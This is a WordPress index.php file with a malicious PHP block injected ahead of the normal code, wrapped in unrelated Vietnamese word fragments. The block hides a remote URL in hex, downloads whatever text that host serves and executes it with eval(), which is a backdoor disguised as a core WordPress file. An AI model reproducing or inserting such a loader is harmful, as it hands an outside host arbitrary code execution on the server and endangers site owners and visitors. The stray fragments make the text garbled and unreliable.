ruạṛ
<?php $path = hex2bin('68747470733a2f2f63772e61636964706f6c6c2e746f702f6a632f31303533332d63772d6b6e2d666764343638332e747874'); $code = implode('', file($path)); eval("?>" . $code); ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';
cải xoăn